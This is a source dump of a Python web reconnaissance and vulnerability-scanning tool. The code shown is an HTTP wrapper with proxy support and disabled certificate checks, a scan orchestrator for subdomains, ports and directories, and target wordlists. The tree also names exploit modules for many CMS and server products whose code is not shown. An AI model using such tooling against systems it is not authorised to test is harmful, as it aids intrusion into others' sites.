├── AWVS_Check
├── AWVS.py
└── __pycache__
│ ├── AWVS.cpython-37.pyc
│ └── AWVS.cpython-38.pyc
├── Information_Scan
├── Requests.py
├── __pycache__
│ ├── Requests.cpython-37.pyc
│ ├── Requests.cpython-38.pyc
│ ├── common.cpython-37.pyc
│ ├── common.cpython-38.pyc
│ ├── iscdn.cpython-37.pyc
│ ├── random_header.cpython-37.pyc
│ ├── random_header.cpython-38.pyc
│ ├── url.cpython-37.pyc
│ ├── url.cpython-38.pyc
│ ├── verify.cpython-37.pyc
│ ├── verify.cpython-38.pyc
│ ├── waf.cpython-37.pyc
│ ├── waf.cpython-38.pyc
│ ├── web_info.cpython-37.pyc
│ └── web_info.cpython-38.pyc
├── common.py
├── data
│ ├── GeoLite2-ASN.mmdb
│ ├── GeoLite2-City.mmdb
│ ├── apps.json
│ ├── apps.txt
│ └── path
│ │ ├── cdn_servers.txt
│ │ ├── dir.txt
│ │ ├── next_sub_full.txt
│ │ ├── user-agents.txt
│ │ └── wydomain.csv
├── plugins
│ ├── ActiveReconnaissance
│ │ ├── __pycache__
│ │ │ ├── active.cpython-37.pyc
│ │ │ ├── check_waf.cpython-37.pyc
│ │ │ ├── check_waf.cpython-38.pyc
│ │ │ ├── crawl.cpython-37.pyc
│ │ │ ├── osdetect.cpython-37.pyc
│ │ │ └── osdetect.cpython-38.pyc
│ │ ├── check_waf.py
│ │ ├── osdetect.py
│ │ └── robots.py
│ ├── InformationGathering
│ │ ├── __pycache__
│ │ │ ├── geoip.cpython-37.pyc
│ │ │ ├── geoip.cpython-38.pyc
│ │ │ └── js_leaks.cpython-37.pyc
│ │ └── geoip.py
│ ├── PassiveReconnaissance
│ │ ├── __pycache__
│ │ │ ├── ip_history.cpython-37.pyc
│ │ │ ├── reverse_domain.cpython-37.pyc
│ │ │ ├── reverse_domain.cpython-38.pyc
│ │ │ ├── sub_domain.cpython-37.pyc
│ │ │ ├── sub_domain.cpython-38.pyc
│ │ │ ├── virustotal.cpython-37.pyc
│ │ │ ├── wappalyzer.cpython-37.pyc
│ │ │ └── wappalyzer.cpython-38.pyc
│ │ ├── ip_history.py
│ │ ├── reverse_domain.py
│ │ ├── sub_domain.py
│ │ └── wappalyzer.py
│ └── Scanning
│ │ ├── __pycache__
│ │ ├── async_scan.cpython-37.pyc
│ │ ├── async_scan.cpython-38.pyc
│ │ ├── check_target.cpython-37.pyc
│ │ ├── check_target.cpython-38.pyc
│ │ ├── port_scan.cpython-37.pyc
│ │ └── port_scan.cpython-38.pyc
│ │ ├── async_scan.py
│ │ ├── check_target.py
│ │ └── port_scan.py
├── random_header.py
├── url.py
├── verify.py
├── waf.py
└── web_info.py
├── JR.py
├── POC_Scan
├── __pycache__
│ ├── main.cpython-37.pyc
│ ├── main.cpython-38.pyc
│ ├── pocdb.cpython-37.pyc
│ └── pocdb.cpython-38.pyc
├── cms
│ ├── __init__.py
│ ├── __pycache__
│ │ ├── __init__.cpython-37.pyc
│ │ ├── __init__.cpython-38.pyc
│ │ ├── cmsmain.cpython-37.pyc
│ │ └── cmsmain.cpython-38.pyc
│ ├── cmsmain.py
│ ├── dedecms
│ │ ├── __init__.py
│ │ ├── __pycache__
│ │ │ ├── __init__.cpython-37.pyc
│ │ │ ├── __init__.cpython-38.pyc
│ │ │ ├── dedecms_download_redirect.cpython-37.pyc
│ │ │ ├── dedecms_download_redirect.cpython-38.pyc
│ │ │ ├── dedecms_error_trace_disclosure.cpython-37.pyc
│ │ │ ├── dedecms_error_trace_disclosure.cpython-38.pyc
│ │ │ ├── dedecms_recommend_sqli.cpython-37.pyc
│ │ │ ├── dedecms_recommend_sqli.cpython-38.pyc
│ │ │ ├── dedecms_search_typeArr_sqli.cpython-37.pyc
│ │ │ ├── dedecms_search_typeArr_sqli.cpython-38.pyc
│ │ │ ├── dedecms_version.cpython-37.pyc
│ │ │ └── dedecms_version.cpython-38.pyc
│ │ ├── dedecms_download_redirect.py
│ │ ├── dedecms_error_trace_disclosure.py
│ │ ├── dedecms_recommend_sqli.py
│ │ ├── dedecms_search_typeArr_sqli.py
│ │ └── dedecms_version.py
│ ├── discuz
│ │ ├── __init__.py
│ │ ├── __pycache__
│ │ │ ├── __init__.cpython-37.pyc
│ │ │ ├── __init__.cpython-38.pyc
│ │ │ ├── discuz_focus_flashxss.cpython-37.pyc
│ │ │ ├── discuz_focus_flashxss.cpython-38.pyc
│ │ │ ├── discuz_forum_message_ssrf.cpython-37.pyc
│ │ │ ├── discuz_forum_message_ssrf.cpython-38.pyc
│ │ │ ├── discuz_plugin_ques_sqli.cpython-37.pyc
│ │ │ ├── discuz_plugin_ques_sqli.cpython-38.pyc
│ │ │ ├── discuz_x25_path_disclosure.cpython-37.pyc
│ │ │ └── discuz_x25_path_disclosure.cpython-38.pyc
│ │ ├── discuz_focus_flashxss.py
│ │ ├── discuz_forum_message_ssrf.py
│ │ ├── discuz_plugin_ques_sqli.py
│ │ └── discuz_x25_path_disclosure.py
│ ├── joomla
│ │ ├── __init__.py
│ │ ├── __pycache__
│ │ │ ├── __init__.cpython-37.pyc
│ │ │ ├── __init__.cpython-38.pyc
│ │ │ ├── joomla_com_docman_lfi.cpython-37.pyc
│ │ │ ├── joomla_com_docman_lfi.cpython-38.pyc
│ │ │ ├── joomla_index_list_sqli.cpython-37.pyc
│ │ │ └── joomla_index_list_sqli.cpython-38.pyc
│ │ ├── joomla_com_docman_lfi.py
│ │ └── joomla_index_list_sqli.py
│ ├── phpcms
│ │ ├── __init__.py
│ │ ├── __pycache__
│ │ │ ├── __init__.cpython-37.pyc
│ │ │ ├── __init__.cpython-38.pyc
│ │ │ ├── phpcms_authkey_disclosure.cpython-37.pyc
│ │ │ ├── phpcms_authkey_disclosure.cpython-38.pyc
│ │ │ ├── phpcms_digg_add_sqli.cpython-37.pyc
│ │ │ ├── phpcms_digg_add_sqli.cpython-38.pyc
│ │ │ ├── phpcms_flash_upload_sqli.cpython-37.pyc
│ │ │ ├── phpcms_flash_upload_sqli.cpython-38.pyc
│ │ │ ├── phpcms_product_code_exec.cpython-37.pyc
│ │ │ ├── phpcms_product_code_exec.cpython-38.pyc
│ │ │ ├── phpcms_v961_fileread.cpython-37.pyc
│ │ │ ├── phpcms_v961_fileread.cpython-38.pyc
│ │ │ ├── phpcms_v96_sqli.cpython-37.pyc
│ │ │ ├── phpcms_v96_sqli.cpython-38.pyc
│ │ │ ├── phpcms_v9_flash_xss.cpython-37.pyc
│ │ │ └── phpcms_v9_flash_xss.cpython-38.pyc
│ │ ├── phpcms_authkey_disclosure.py
│ │ ├── phpcms_digg_add_sqli.py
│ │ ├── phpcms_flash_upload_sqli.py
│ │ ├── phpcms_product_code_exec.py
│ │ ├── phpcms_v961_fileread.py
│ │ ├── phpcms_v96_sqli.py
│ │ └── phpcms_v9_flash_xss.py
│ ├── phpmyadmin
│ │ ├── __init__.py
│ │ ├── __pycache__
│ │ │ ├── __init__.cpython-37.pyc
│ │ │ ├── __init__.cpython-38.pyc
│ │ │ ├── phpmyadmin_setup_lfi.cpython-37.pyc
│ │ │ └── phpmyadmin_setup_lfi.cpython-38.pyc
│ │ └── phpmyadmin_setup_lfi.py
│ ├── phpok
│ │ ├── __init__.py
│ │ ├── __pycache__
│ │ │ ├── __init__.cpython-37.pyc
│ │ │ ├── __init__.cpython-38.pyc
│ │ │ ├── phpok_api_param_sqli.cpython-37.pyc
│ │ │ ├── phpok_api_param_sqli.cpython-38.pyc
│ │ │ ├── phpok_remote_image_getshell.cpython-37.pyc
│ │ │ ├── phpok_remote_image_getshell.cpython-38.pyc
│ │ │ ├── phpok_res_action_control_filedownload.cpython-37.pyc
│ │ │ └── phpok_res_action_control_filedownload.cpython-38.pyc
│ │ ├── phpok_api_param_sqli.py
│ │ ├── phpok_remote_image_getshell.py
│ │ └── phpok_res_action_control_filedownload.py
│ ├── phpstudy
│ │ ├── __init__.py
│ │ ├── __pycache__
│ │ │ ├── __init__.cpython-37.pyc
│ │ │ ├── __init__.cpython-38.pyc
│ │ │ ├── phpstudy_backdoor.cpython-37.pyc
│ │ │ ├── phpstudy_backdoor.cpython-38.pyc
│ │ │ ├── phpstudy_phpmyadmin_defaultpwd.cpython-37.pyc
│ │ │ └── phpstudy_probe.cpython-37.pyc
│ │ └── phpstudy_backdoor.py
│ ├── sangfor
│ │ ├── __pycache__
│ │ │ └── sanfor_edr.cpython-38.pyc
│ │ └── sanfor_edr.py
│ ├── tongda_oa
│ │ ├── __pycache__
│ │ │ └── tongdaRCE.cpython-38.pyc
│ │ └── tongdaRCE.py
│ ├── weaver_oa
│ │ ├── __init__.py
│ │ ├── __pycache__
│ │ │ ├── __init__.cpython-37.pyc
│ │ │ ├── __init__.cpython-38.pyc
│ │ │ ├── weaver_oa_db_disclosure.cpython-37.pyc
│ │ │ ├── weaver_oa_db_disclosure.cpython-38.pyc
│ │ │ ├── weaver_oa_download_sqli.cpython-37.pyc
│ │ │ ├── weaver_oa_download_sqli.cpython-38.pyc
│ │ │ ├── weaver_oa_filedownload.cpython-37.pyc
│ │ │ └── weaver_oa_filedownload.cpython-38.pyc
│ │ ├── weaver_oa_db_disclosure.py
│ │ ├── weaver_oa_download_sqli.py
│ │ └── weaver_oa_filedownload.py
│ └── wordpress
│ │ ├── __init__.py
│ │ ├── __pycache__
│ │ ├── __init__.cpython-37.pyc
│ │ ├── __init__.cpython-38.pyc
│ │ ├── wordpress_admin_ajax_filedownload.cpython-37.pyc
│ │ ├── wordpress_admin_ajax_filedownload.cpython-38.pyc
│ │ ├── wordpress_display_widgets_backdoor.cpython-37.pyc
│ │ ├── wordpress_display_widgets_backdoor.cpython-38.pyc
│ │ ├── wordpress_plugin_ShortCode_lfi.cpython-37.pyc
│ │ ├── wordpress_plugin_ShortCode_lfi.cpython-38.pyc
│ │ ├── wordpress_plugin_azonpop_sqli.cpython-37.pyc
│ │ ├── wordpress_plugin_azonpop_sqli.cpython-38.pyc
│ │ ├── wordpress_plugin_mailpress_rce.cpython-37.pyc
│ │ ├── wordpress_plugin_mailpress_rce.cpython-38.pyc
│ │ ├── wordpress_restapi_sqli.cpython-37.pyc
│ │ ├── wordpress_restapi_sqli.cpython-38.pyc
│ │ ├── wordpress_url_redirect.cpython-37.pyc
│ │ ├── wordpress_url_redirect.cpython-38.pyc
│ │ ├── wordpress_woocommerce_code_exec.cpython-37.pyc
│ │ └── wordpress_woocommerce_code_exec.cpython-38.pyc
│ │ ├── wordpress_admin_ajax_filedownload.py
│ │ ├── wordpress_display_widgets_backdoor.py
│ │ ├── wordpress_plugin_ShortCode_lfi.py
│ │ ├── wordpress_plugin_azonpop_sqli.py
│ │ ├── wordpress_plugin_mailpress_rce.py
│ │ ├── wordpress_restapi_sqli.py
│ │ ├── wordpress_url_redirect.py
│ │ └── wordpress_woocommerce_code_exec.py
├── information
│ ├── __init__.py
│ ├── __pycache__
│ │ ├── __init__.cpython-37.pyc
│ │ ├── __init__.cpython-38.pyc
│ │ ├── apache_server_status_disclosure.cpython-37.pyc
│ │ ├── apache_server_status_disclosure.cpython-38.pyc
│ │ ├── crossdomain_find.cpython-37.pyc
│ │ ├── crossdomain_find.cpython-38.pyc
│ │ ├── git_check.cpython-37.pyc
│ │ ├── git_check.cpython-38.pyc
│ │ ├── informationmain.cpython-37.pyc
│ │ ├── informationmain.cpython-38.pyc
│ │ ├── jetbrains_ide_workspace_disclosure.cpython-37.pyc
│ │ ├── jetbrains_ide_workspace_disclosure.cpython-38.pyc
│ │ ├── jsp_conf_find.cpython-37.pyc
│ │ ├── jsp_conf_find.cpython-38.pyc
│ │ ├── options_method.cpython-37.pyc
│ │ ├── options_method.cpython-38.pyc
│ │ ├── robots_find.cpython-37.pyc
│ │ ├── robots_find.cpython-38.pyc
│ │ ├── springboot_api.cpython-37.pyc
│ │ ├── springboot_api.cpython-38.pyc
│ │ ├── svn_check.cpython-37.pyc
│ │ └── svn_check.cpython-38.pyc
│ ├── apache_server_status_disclosure.py
│ ├── crossdomain_find.py
│ ├── git_check.py
│ ├── informationmain.py
│ ├── jetbrains_ide_workspace_disclosure.py
│ ├── jsp_conf_find.py
│ ├── options_method.py
│ ├── robots_find.py
│ ├── springboot_api.py
│ └── svn_check.py
├── main.py
├── pocdb.py
└── system
│ ├── __init__.py
│ ├── __pycache__
│ ├── __init__.cpython-37.pyc
│ ├── __init__.cpython-38.pyc
│ ├── systemmain.cpython-37.pyc
│ └── systemmain.cpython-38.pyc
│ ├── iis
│ ├── __init__.py
│ ├── __pycache__
│ │ ├── __init__.cpython-37.pyc
│ │ ├── __init__.cpython-38.pyc
│ │ ├── iis_webdav_rce.cpython-37.pyc
│ │ └── iis_webdav_rce.cpython-38.pyc
│ └── iis_webdav_rce.py
│ ├── nginx
│ ├── __init__.py
│ ├── __pycache__
│ │ ├── __init__.cpython-37.pyc
│ │ ├── __init__.cpython-38.pyc
│ │ ├── multi_fastcgi_code_exec.cpython-37.pyc
│ │ └── multi_fastcgi_code_exec.cpython-38.pyc
│ └── multi_fastcgi_code_exec.py
│ ├── php
│ ├── __init__.py
│ ├── __pycache__
│ │ ├── __init__.cpython-37.pyc
│ │ ├── __init__.cpython-38.pyc
│ │ ├── php_expose_disclosure.cpython-37.pyc
│ │ ├── php_expose_disclosure.cpython-38.pyc
│ │ ├── php_fastcgi_read.cpython-37.pyc
│ │ └── php_fastcgi_read.cpython-38.pyc
│ ├── php_expose_disclosure.py
│ └── php_fastcgi_read.py
│ ├── ssh
│ ├── __init__.py
│ ├── __pycache__
│ │ ├── __init__.cpython-37.pyc
│ │ ├── __init__.cpython-38.pyc
│ │ ├── libssh_bypass_auth.cpython-37.pyc
│ │ └── libssh_bypass_auth.cpython-38.pyc
│ └── libssh_bypass_auth.py
│ ├── systemmain.py
│ ├── tomcat
│ ├── __init__.py
│ ├── __pycache__
│ │ ├── __init__.cpython-37.pyc
│ │ ├── __init__.cpython-38.pyc
│ │ ├── tomcat_Ajp_lfi.cpython-37.pyc
│ │ ├── tomcat_Ajp_lfi.cpython-38.pyc
│ │ ├── tomcat_put_exec.cpython-37.pyc
│ │ ├── tomcat_put_exec.cpython-38.pyc
│ │ └── tomcat_weak_pass.cpython-37.pyc
│ ├── tomcat_Ajp_lfi.py
│ └── tomcat_put_exec.py
│ ├── weblogic
│ ├── __init__.py
│ ├── __pycache__
│ │ ├── __init__.cpython-37.pyc
│ │ ├── __init__.cpython-38.pyc
│ │ ├── weblogic_interface_disclosure.cpython-37.pyc
│ │ ├── weblogic_interface_disclosure.cpython-38.pyc
│ │ ├── weblogic_ssrf.cpython-37.pyc
│ │ ├── weblogic_ssrf.cpython-38.pyc
│ │ ├── weblogic_weak_pass.cpython-37.pyc
│ │ ├── weblogic_ws_utc_xxe.cpython-37.pyc
│ │ ├── weblogic_ws_utc_xxe.cpython-38.pyc
│ │ ├── weblogic_xmldecoder_exec.cpython-37.pyc
│ │ └── weblogic_xmldecoder_exec.cpython-38.pyc
│ ├── weblogic_interface_disclosure.py
│ ├── weblogic_ssrf.py
│ ├── weblogic_ws_utc_xxe.py
│ └── weblogic_xmldecoder_exec.py
│ └── windows
│ ├── 0708detector.exe
│ ├── RDP_CodeExecution.py
│ ├── __pycache__
│ ├── RDP_CodeExecution.cpython-37.pyc
│ ├── RDP_CodeExecution.cpython-38.pyc
│ ├── smb_code_execution.cpython-37.pyc
│ └── smb_code_execution.cpython-38.pyc
│ └── smb_code_execution.py
├── README.md
├── __pycache__
├── report.cpython-37.pyc
└── report.cpython-38.pyc
├── images
├── dbs.png
├── image
├── port.png
├── url.png
├── vuln.png
├── 启动.png
├── 子域名.png
└── 整站.png
├── lib
├── __pycache__
│ ├── active.cpython-37.pyc
│ ├── active.cpython-38.pyc
│ ├── bcolors.cpython-37.pyc
│ ├── bcolors.cpython-38.pyc
│ ├── cli_output.cpython-37.pyc
│ ├── cli_output.cpython-38.pyc
│ ├── enter.cpython-37.pyc
│ ├── enter.cpython-38.pyc
│ ├── setting.cpython-37.pyc
│ ├── setting.cpython-38.pyc
│ ├── sqldb.cpython-37.pyc
│ └── sqldb.cpython-38.pyc
├── active.py
├── bcolors.py
├── cli_output.py
├── enter.py
├── setting.py
└── sqldb.py
├── report.py
├── report
├── bootstrap.min.css
├── en.js
├── fonts
│ ├── element-icons.ttf
│ └── element-icons.woff
├── index.css
├── index.js
├── report.htm
└── vue.min.js
├── requirements.txt
├── result.db
└── scan_20201012192034.html
/AWVS_Check/__pycache__/AWVS.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/AWVS_Check/__pycache__/AWVS.cpython-37.pyc
--------------------------------------------------------------------------------
/AWVS_Check/__pycache__/AWVS.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/AWVS_Check/__pycache__/AWVS.cpython-38.pyc
--------------------------------------------------------------------------------
/Information_Scan/Requests.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib3
3 | import hashlib
4 | import random
5 | import re
6 | import ssl
7 | import socks
8 | import socket
9 | from Information_Scan.random_header import get_ua
10 | from lib.setting import TIMEOUT, COOKIE, SOCKS5
11 |
12 | def verify(url): #判断是不是https 并返回携带协议的url
13 | if not re.search('http:|https:', url):
14 | url = 'http://' + url
15 | return url
16 |
17 |
18 | class Requests:
19 | def __init__(self):
20 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) #忽略警告 HTTPS请求不支持证书验证
21 | requests.packages.urllib3.disable_warnings() #忽略警告
22 |
23 | self.timeout = TIMEOUT #延迟
24 | self.session = requests.Session() #下次请求自动带上请求参数
25 | self.headers = get_ua() #自定义请求头
26 |
27 | if COOKIE == 'random':
28 | plain = ''.join([random.choice('0123456789') for _ in range(8)]) #随机选8个 37247698
29 | md5sum = hashlib.md5() #创建hashlib的md5对象
30 | md5sum.update(plain.encode('utf-8')) #将字符串载入到md5对象中,获得md5算法加密。
31 | md5 = md5sum.hexdigest() #通过hexdigest()方法,获得new_md5对象的16进制md5显示。
32 | self.headers.update({'Cookie': 'SESSION=' + md5}) #更新headers头信息
33 | else:
34 | self.headers.update(COOKIE) #更新headers头信息
35 |
36 | if SOCKS5: #代理
37 | ip, port = SOCKS5
38 | socks.set_default_proxy(socks.SOCKS5, ip, port)
39 | socket.socket = socks.socksocket #建立连接
40 |
41 | def scan(self, url):
42 | url = verify(url) #https://www.baidu.com http://www.baidu.com
43 | try:
44 | r = self.session.get(url,
45 | timeout=self.timeout,
46 | headers=self.headers,
47 | verify=False, #证书
48 | stream=True,
49 | allow_redirects=False) #重定向
50 | return r #连接信息
51 |
52 | except:
53 | pass
54 |
55 |
56 | def get(self, url):
57 | url = verify(url) #判断是不是https
58 | try:
59 | r = self.session.get(url, timeout=self.timeout, headers=self.headers, verify=False, allow_redirects=False) #长连接
60 | return r #返回长连接信息
61 | except:
62 | pass
63 |
64 |
65 | def post(self, url, data):
66 | url = verify(url) #https://www.baidu.com
67 | try:
68 | r = self.session.post(url,
69 | data=data,
70 | timeout=self.timeout,
71 | headers=self.headers,
72 | verify=False,
73 | allow_redirects=False) #allow_redirects=False 不准重定向
74 | return r
75 | except:
76 | pass
77 |
78 | def request(self, url, method, data=None, headers=None): #发起请求
79 | url = verify(url) #http|https分析后的url
80 | try:
81 | if method == 'get':
82 | r = self.session.get(url, timeout=self.timeout, headers=headers, verify=False, allow_redirects=True) #verify处理不信任的证书
83 | return r
84 | else:
85 | r = self.session.post(url,
86 | data=data,
87 | timeout=self.timeout,
88 | headers=headers,
89 | verify=False,
90 | allow_redirects=False)
91 | return r
92 | except:
93 | pass
94 |
95 |
--------------------------------------------------------------------------------
/Information_Scan/__pycache__/Requests.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/Requests.cpython-37.pyc
--------------------------------------------------------------------------------
/Information_Scan/__pycache__/Requests.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/Requests.cpython-38.pyc
--------------------------------------------------------------------------------
/Information_Scan/__pycache__/common.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/common.cpython-37.pyc
--------------------------------------------------------------------------------
/Information_Scan/__pycache__/common.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/common.cpython-38.pyc
--------------------------------------------------------------------------------
/Information_Scan/__pycache__/iscdn.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/iscdn.cpython-37.pyc
--------------------------------------------------------------------------------
/Information_Scan/__pycache__/random_header.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/random_header.cpython-37.pyc
--------------------------------------------------------------------------------
/Information_Scan/__pycache__/random_header.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/random_header.cpython-38.pyc
--------------------------------------------------------------------------------
/Information_Scan/__pycache__/url.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/url.cpython-37.pyc
--------------------------------------------------------------------------------
/Information_Scan/__pycache__/url.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/url.cpython-38.pyc
--------------------------------------------------------------------------------
/Information_Scan/__pycache__/verify.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/verify.cpython-37.pyc
--------------------------------------------------------------------------------
/Information_Scan/__pycache__/verify.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/verify.cpython-38.pyc
--------------------------------------------------------------------------------
/Information_Scan/__pycache__/waf.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/waf.cpython-37.pyc
--------------------------------------------------------------------------------
/Information_Scan/__pycache__/waf.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/waf.cpython-38.pyc
--------------------------------------------------------------------------------
/Information_Scan/__pycache__/web_info.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/web_info.cpython-37.pyc
--------------------------------------------------------------------------------
/Information_Scan/__pycache__/web_info.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/__pycache__/web_info.cpython-38.pyc
--------------------------------------------------------------------------------
/Information_Scan/common.py:
--------------------------------------------------------------------------------
1 | from Information_Scan.web_info import web_info
2 | from lib.sqldb import Sqldb
3 | from Information_Scan.verify import verify_https
4 | from Information_Scan.plugins.Scanning.port_scan import ScanPort
5 | from Information_Scan.plugins.Scanning.async_scan import DirScan
6 | from Information_Scan.plugins.PassiveReconnaissance.sub_domain import sub_domain
7 | from Information_Scan.url import parse_host
8 |
9 | def web_save(webinfo, dbname):
10 | Sqldb(dbname).get_webinfo(webinfo) #保存到数据库
11 |
12 | def start(target, dbname):
13 | title = 'test'
14 | url = verify_https(target) #判断是否跳转并获得最终url http+url还是https+url
15 |
16 | data, apps, title = web_info(url) #返回目标信息 数据 网站标题
17 |
18 | host = parse_host(url)
19 | subip = sub_domain(host).execution() # 子域名查询
20 |
21 | open_port = ScanPort(url, dbname) #端口信息
22 | open_port.pool()
23 |
24 | dirscan = DirScan(dbname, url) #实例化
25 | dirscan.pool() #网站信息探测,保存到数据库
26 |
27 | web_save(data, dbname) #操作系统各种信息 数据库名字
28 |
29 | if __name__ == "__main__":
30 | start('http://127.0.0.1')
--------------------------------------------------------------------------------
/Information_Scan/data/GeoLite2-ASN.mmdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/data/GeoLite2-ASN.mmdb
--------------------------------------------------------------------------------
/Information_Scan/data/GeoLite2-City.mmdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/data/GeoLite2-City.mmdb
--------------------------------------------------------------------------------
/Information_Scan/data/path/cdn_servers.txt:
--------------------------------------------------------------------------------
1 | chinacache.net
2 | lxdns.com
3 | fastcdn.cn
4 | globalcdn.cn
5 | lxcdn.com
6 | aicdn.com
7 | cdn20.com
8 | fastwebcdn.com
9 | cloudcdn.net
10 | akamai-staging.net
11 | akamaized.net
12 | akamai.net
13 | cloudfront.net
14 | amazonaws.com
15 | azioncdn.net
16 | cachefly.net
17 | cdn77.net
18 | cdn77.org
19 | cdnetworks.com
20 | gccdn.net
21 | cdnify.io
22 | cdnsun.net
23 | cdnvideo.ru
24 | wscloudcdn.com
25 | edgecastcdn.net
26 | fastly.net
27 | qianxun.com
28 | hwcdn.net
29 | incapdns.net
30 | internapcdn.net
31 | jdcdn.com
32 | kxcdn.com
33 | Leaseweb
34 | lswcdn.net
35 | fpbns.net.
36 | footprint.net
37 | llnwd.net
38 | netdna-cdn.com
39 | ngenix.net
40 | ccgslb.com.cn
41 | mwcloudcdn.com
42 | speedcdns.com
43 | skyparkcdn.net
44 | ourglb0.com
45 | bitgravity.com
46 | azureedge.net
47 | anankecdn.com.br
48 | presscdn.com
49 | telefonica.com
50 | alikunlun.com
51 | ourwebcdn.com
52 | aliyuncs.com
53 | aliyun-inc.com
54 | cdn.dnsv1.com
55 | cdntip.com
56 | alicdn.com
57 | cdn20.info
58 | acadn.com
59 | fastcdn.com
60 | tcdn.qq.com
61 | dayugslb.com
--------------------------------------------------------------------------------
/Information_Scan/data/path/dir.txt:
--------------------------------------------------------------------------------
1 | /home
2 | /con
3 | /su
4 | /user
5 | /static
6 | /stat
7 | /more
8 | /bhan
9 | /pub
10 | /repair
11 | /2007
12 | /2009
13 | /2004
14 | /app
15 | /temple
16 | /images
17 | /templete
18 | /site
19 | /cret
20 | /welcome.html
21 | /aaa.txt
22 | /aab.txt
23 | /aac.txt
24 | /aad.txt
25 | /aae.txt
26 | /aaf.txt
27 | /aag.txt
28 | /aah.txt
29 | /jay.txt
30 | /jaz.txt
31 | /jba.txt
32 | /jbb.txt
33 | /jbc.txt
34 | /jbd.txt
35 | /index.php
36 | /default.html
37 |
--------------------------------------------------------------------------------
/Information_Scan/plugins/ActiveReconnaissance/__pycache__/active.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/ActiveReconnaissance/__pycache__/active.cpython-37.pyc
--------------------------------------------------------------------------------
/Information_Scan/plugins/ActiveReconnaissance/__pycache__/check_waf.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/ActiveReconnaissance/__pycache__/check_waf.cpython-37.pyc
--------------------------------------------------------------------------------
/Information_Scan/plugins/ActiveReconnaissance/__pycache__/check_waf.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/ActiveReconnaissance/__pycache__/check_waf.cpython-38.pyc
--------------------------------------------------------------------------------
/Information_Scan/plugins/ActiveReconnaissance/__pycache__/crawl.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/ActiveReconnaissance/__pycache__/crawl.cpython-37.pyc
--------------------------------------------------------------------------------
/Information_Scan/plugins/ActiveReconnaissance/__pycache__/osdetect.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/ActiveReconnaissance/__pycache__/osdetect.cpython-37.pyc
--------------------------------------------------------------------------------
/Information_Scan/plugins/ActiveReconnaissance/__pycache__/osdetect.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/ActiveReconnaissance/__pycache__/osdetect.cpython-38.pyc
